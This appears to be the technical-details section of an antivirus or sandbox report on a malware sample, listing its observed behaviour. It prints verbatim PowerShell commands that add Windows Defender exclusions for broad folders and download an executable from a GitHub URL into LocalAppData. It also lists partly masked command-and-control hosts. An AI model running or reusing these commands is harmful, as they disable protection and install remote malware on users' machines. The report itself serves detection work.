Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionPath '%LOCALAPPDATA%\optdnggfin', 'C:\Users', '%ALLUSERSPROFILE%'"
- %TEMP%\bdc.tmp.exe
- 'po###to-me.com':443
- '18#.#1.61.10':80
- http://18#.#1.61.10/ScreenSync.exe
- 'po###to-me.com':443
- DNS ASK po###to-me.com
- '%TEMP%\bdc.tmp.exe'
- '<SYSTEM32>\cmd.exe' /c powershell -Command "Add-MpPreference -ExclusionPath '%LOCALAPPDATA%\optdnggfin', 'C:\Users', '%ALLUSERSPROFILE%'"
- '<SYSTEM32>\cmd.exe' /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/romawer/raw/refs/heads/main/leohjawdjth.exe' -OutFile '%LOCALAPPDATA%\optdnggfin\Service.exe'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/romawer/raw/refs/heads/main/leohjawdjth.exe' -OutFile '%LOCALAPPDATA%\optdnggfin\Service.exe'"